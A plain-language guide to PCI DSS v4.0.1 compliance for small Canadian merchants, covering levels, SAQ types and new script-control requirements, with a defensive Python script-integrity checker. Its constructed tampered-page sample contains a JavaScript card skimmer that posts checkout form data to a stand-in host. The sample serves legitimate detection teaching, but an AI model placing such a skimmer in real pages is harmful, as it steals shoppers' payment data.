
PCI compliance for small merchants and service providers

If your business takes card payments, PCI DSS already applies to you, even if you process a single transaction a year. The hard part isn't the security itself; it's working out which slice of the standard you actually have to meet, and not over-buying to get there.

This is a plain-language guide for a small Canadian merchant or service provider: what PCI is, where your business fits, how you prove it, and what changed in the latest version. It's a general overview, not legal or assessor advice; for your exact obligations, confirm with your payment processor or a qualified assessor.

PCI is a contract, not a law

PCI DSS (the Payment Card Industry Data Security Standard) is published by the PCI Security Standards Council, a body founded by the major card brands (Visa, Mastercard, American Express, Discover, and JCB), not by any government. There is no PCI inspector who shows up at your door. The standard is enforced through your merchant agreement by your acquiring bank, which in practice usually means the payment processor you deal with. That makes non-compliance a contractual and financial problem, not a regulatory one: monthly non-compliance fees, higher transaction rates, and, if you suffer a breach, liability for fraud losses, card re-issuance and forensic investigation costs.

The current version is v4.0.1. Its predecessors are retired: v3.2.1 on 31 March 2024 and v4.0 on 31 December 2024, so any assessment you start now is against v4.0.1. Because it is a global card-brand standard rather than Canadian law, it applies to any business in Canada that accepts cards, in addition to, and separately from, privacy law such as PIPEDA.

The four levels: where a small business fits

The card brands sort every merchant into one of four levels based on yearly card transaction volume, and the level decides how much you have to do to validate. The thresholds below are Visa's and Mastercard's, which is what most processors use; other brands differ slightly, and your acquirer has the final say on which level you are assigned:

  • Level 1: more than 6 million transactions a year across all channels, or any merchant the brands place here after a breach. Requires an annual on-site assessment, documented in a Report on Compliance, normally performed by a Qualified Security Assessor (QSA).
  • Level 2: 1 to 6 million transactions a year across all channels.
  • Level 3: 20,000 to 1 million e-commerce transactions a year.
  • Level 4: fewer than 20,000 e-commerce transactions a year, and all other merchants with up to 1 million transactions a year in total.

Almost every small business lands in Level 4, the lightest tier, where you assess yourself instead of hiring an outside auditor. One thing to keep in mind: the brands can move any merchant that suffers a breach up to Level 1, so not getting breached is also what keeps your validation burden small.

Merchant or service provider? You might be both

This is a distinction many owners miss. A merchant sells goods or services and accepts cards. A service provider is a business that stores, processes, or transmits other companies' cardholder data, or could otherwise affect the security of someone else's card payments. Think of a payment gateway, a host that runs a client's checkout, or a SaaS platform that handles billing on behalf of its customers.

If other businesses' customers' card data flows through your systems, you are a service provider and carry your own PCI obligations, on top of any you have as a merchant. Service providers have their own two-tier scheme: above roughly 300,000 transactions a year the brands expect a QSA-led assessment, below it a self-assessment on the service-provider version of SAQ D; confirm the exact threshold with your acquirer or the brand. A lot of small SaaS founders don't realize they have crossed that line until a customer's security questionnaire asks for their PCI status. If you build software that touches payments, assume the question is coming and find out where you stand before it does.

How you actually prove it: the SAQ

For a Level 4 business, "doing PCI" usually means completing a Self-Assessment Questionnaire (SAQ) once a year, signing the matching Attestation of Compliance (AOC), and, where your SAQ calls for it (anything with internet-facing systems in scope), passing quarterly external vulnerability scans run by an Approved Scanning Vendor (ASV). There are several SAQ types, and which one you file depends entirely on how you take payments:

  • SAQ A: card-not-present only (e-commerce or mail and telephone order) where every cardholder data function is fully outsourced to PCI-compliant providers and you store no card data electronically, for example a hosted Stripe Checkout or Shopify checkout. This is the shortest questionnaire.
  • SAQ A-EP: e-commerce where your own web server never receives card data but does control how it is captured, for example you serve the checkout page and redirect the shopper, or post the card fields, to the processor. Your website is in scope, so this questionnaire is far longer than SAQ A.
  • SAQ B: imprint machines or standalone dial-out terminals, with no electronic storage of card data.
  • SAQ B-IP: standalone, PTS-approved card terminals that connect to the processor over the internet, with no electronic storage.
  • SAQ C-VT: a browser-based virtual terminal on one isolated computer, into which you key payments one at a time, with no electronic storage.
  • SAQ C: a payment application (for example a point-of-sale system) connected to the internet, with no electronic storage.
  • SAQ P2PE: hardware terminals that are part of a PCI-listed point-to-point encryption solution, with no electronic storage.
  • SAQ D: everything else, including anyone who stores card data electronically. It covers the full standard.

The single biggest lever is keeping card data out of your own systems: outsource the actual handling to a compliant processor and you qualify for the shortest SAQ with the fewest controls to prove. Your processor will tell you exactly which SAQ you are required to file, so ask them rather than guessing.

What changed in version 4.0.1, and what bites small shops

The future-dated requirements in v4.0.1 became mandatory on 31 March 2025. Three of them matter most for a small business:

  • Multi-factor authentication on everything that touches card data. MFA used to be required only for administrators and for remote access into the network. Under requirement 8.4.2 it is now required for all access into the cardholder data environment, including ordinary staff accounts.
  • You are accountable for your vendors. Keeping a list of the third parties that handle card data for you and checking their compliance status at least annually (requirement 12.8) is not new, but v4.0.1 tightens it: you also have to record which PCI requirements each provider covers for you and which remain yours. In practice that means collecting a current Attestation of Compliance from your point-of-sale vendor, gateway, and hosting provider.
  • Script controls for online checkouts. If you run an e-commerce payment page, requirements 6.4.3 and 11.6.1 say you must keep an inventory of every script that loads on it, with a written justification for each, confirm each script is authorized and its integrity assured, and run a change- and tamper-detection mechanism on the page's HTTP headers and script content that alerts you to unauthorized changes. The controls are aimed at digital skimming, where injected JavaScript steals card numbers straight from the shopper's browser. One caveat if you file SAQ A: the January 2025 revision of that questionnaire replaced these two requirements with an eligibility criterion that you confirm your site is not susceptible to script-based attacks, typically by relying on your payment provider's protections, so check the current SAQ A rather than assuming either way.
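
To make the script-control requirements concrete, here is an added example, not from the PCI Security Standards Council or from this guide's author, of the script-side checks as a small Python program. It builds the authorized-script inventory from a reviewed copy of the checkout page (requirement 6.4.3), compares a later fetch of the page against that inventory and reports anything new, removed, or altered (the script half of requirement 11.6.1), and derives a Content-Security-Policy script-src directive from the inventory so the browser itself refuses anything not on the list. The HTML pages, the hosts js.processor.example, stats.example, and the integrity value are all constructed for the example; the program reads the HTML you hand it and does not fetch anything from the network.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


def csp_sha256(text: str) -> str:
    """Hash an inline script body the way CSP and SRI expect: base64(SHA-256)."""
    digest = hashlib.sha256(text.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


class _ScriptCollector(HTMLParser):
    # Records each <script>: externals by src + integrity attribute, inlines by body hash.
    def __init__(self):
        super().__init__()
        self.scripts, self._inline, self._buf = [], False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append({"kind": "external", "src": a["src"],
                                 "integrity": a.get("integrity")})
        else:
            self._inline, self._buf = True, []

    def handle_data(self, data):
        if self._inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline:
            self._inline = False
            self.scripts.append({"kind": "inline", "hash": csp_sha256("".join(self._buf))})


def extract_scripts(html: str) -> list:
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def build_inventory(reviewed_html: str) -> dict:
    """Authorized-script inventory (6.4.3) from a page you have reviewed and approved.
    Keys are the external src or the inline hash; record each script's business
    justification alongside these entries in your real inventory."""
    inventory = {}
    for s in extract_scripts(reviewed_html):
        if s["kind"] == "external":
            inventory[s["src"]] = {"kind": "external", "integrity": s["integrity"]}
        else:
            inventory[s["hash"]] = {"kind": "inline"}
    return inventory


def check_page(html: str, inventory: dict) -> list:
    """Compare the HTML a browser actually receives with the inventory (script part
    of 11.6.1). Returns human-readable findings; an empty list means no change."""
    findings, seen = [], set()
    for s in extract_scripts(html):
        if s["kind"] == "external":
            seen.add(s["src"])
            authorized = inventory.get(s["src"])
            if authorized is None:
                findings.append(f"unauthorized external script: {s['src']}")
            elif s["integrity"] != authorized["integrity"]:
                findings.append(f"integrity attribute changed or removed: {s['src']}")
        else:
            seen.add(s["hash"])
            if s["hash"] not in inventory:
                findings.append(f"unrecognised inline script: {s['hash']}")
    for key in inventory:
        if key not in seen:
            findings.append(f"authorized script missing from page: {key}")
    return findings


def csp_script_src(inventory: dict) -> str:
    """Derive a CSP script-src directive from the inventory: the approved external
    origins ('self' for relative paths) plus hashes of the approved inline blocks."""
    origins, hashes = set(), []
    for key, authorized in inventory.items():
        if authorized["kind"] == "external":
            u = urlsplit(key)
            origins.add(f"{u.scheme}://{u.netloc}" if u.netloc else "'self'")
        else:
            hashes.append(f"'{key}'")
    return "script-src " + " ".join(sorted(origins) + sorted(hashes))


# Constructed sample: the checkout page as reviewed and approved. The hosts and the
# integrity value are illustrative, not real services or real hashes.
BASELINE_PAGE = """<!doctype html><html><head><title>Checkout</title>
<script src="https://js.processor.example/v3/"></script>
<script src="/static/checkout.js"
        integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
        crossorigin="anonymous"></script>
<script>window.checkoutConfig = {currency: "CAD"};</script>
</head><body><form id="payment"></form></body></html>"""

# The same page after a hypothetical skimmer injection: the inline block now also
# posts the form to an attacker-controlled host, and a new external script loads.
TAMPERED_PAGE = BASELINE_PAGE.replace(
    '<script>window.checkoutConfig = {currency: "CAD"};</script>',
    '<script>window.checkoutConfig = {currency: "CAD"};'
    'document.forms[0].addEventListener("submit", function () {'
    'fetch("https://stats.example/c", {method: "POST", body: new FormData(this)});'
    '});</script><script src="https://stats.example/analytics.js"></script>',
)

if __name__ == "__main__":
    inventory = build_inventory(BASELINE_PAGE)
    print(csp_script_src(inventory))
    for finding in check_page(TAMPERED_PAGE, inventory):
        print("ALERT:", finding)
```

Two practical notes. Run check_page against what a shopper's browser actually receives (a fetch from outside your network, on the schedule your SAQ sets; 11.6.1 says at least weekly or as often as your risk analysis dictates), not against the file on your server, because injected skimmers often arrive via a compromised CDN or third-party tag rather than your own code. And processor-hosted scripts such as a gateway's checkout library change in place and cannot be pinned with an integrity attribute; for those, the "integrity assured" part of 6.4.3 is the provider's own control, which is what you write down as the justification in your inventory. The example only covers script content; 11.6.1 also asks you to watch the page's security-relevant HTTP headers, which the same comparison approach extends to.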

None of these are exotic. MFA and a current vendor list are things a well-run small business should have anyway, which leads to the encouraging part.

The good news: you probably have most of it already

PCI reads as intimidating, but for a typical small merchant the controls are mostly already sitting in the tools you use. Modern platforms like Square, Shopify, Stripe, and Moneris build in encryption, tokenization, and MFA, and they shoulder the heaviest parts of the standard so you don't store raw card numbers at all. For most small businesses, PCI is less about buying security products and more about choosing compliant providers, keeping card data off your own laptops and spreadsheets, and writing down what you do.

The trap is the opposite of overspending: handling card data manually where you don't have to. A card number jotted on a notepad, sent by email, or stored in a CRM field drags more of your systems into scope and makes every part of compliance harder.

Source: PCI Security Standards Council, Merchants
